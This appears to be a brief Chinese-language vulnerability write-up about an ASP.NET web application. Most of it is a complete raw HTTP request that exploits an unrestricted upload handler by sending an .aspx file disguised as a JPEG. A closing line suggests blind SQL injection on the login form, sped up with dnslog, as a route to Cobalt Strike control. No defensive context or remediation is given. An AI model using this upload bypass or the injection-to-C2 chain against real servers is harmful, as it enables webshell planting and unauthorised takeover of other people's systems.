Part.1 任意文件上传
POST /Ajax/UploadImgHandler.ashx HTTP/1.1
Host: host
Content-Length: 2678
Accept: */*
Origin: http://host/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycxwUtYeU8srlm2tL
Referer: http://host/Notice2/ImgAdd.aspx
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=o15xksru5ecd3u4jgwcjapil; dt_manage_navigation_cookie=undefined
Connection: close
------WebKitFormBoundarycxwUtYeU8srlm2tL
Content-Disposition: form-data; name="file1"; filename="pdd.aspx"
Content-Type: image/jpeg
Tools NB
------WebKitFormBoundarycxwUtYeU8srlm2tL--Part.2 SQL
登录框POST盲注,可以结合dnslog 快速注入 直接CS上线 、。。。。
本文作者为烏鷄哥,转载请注明。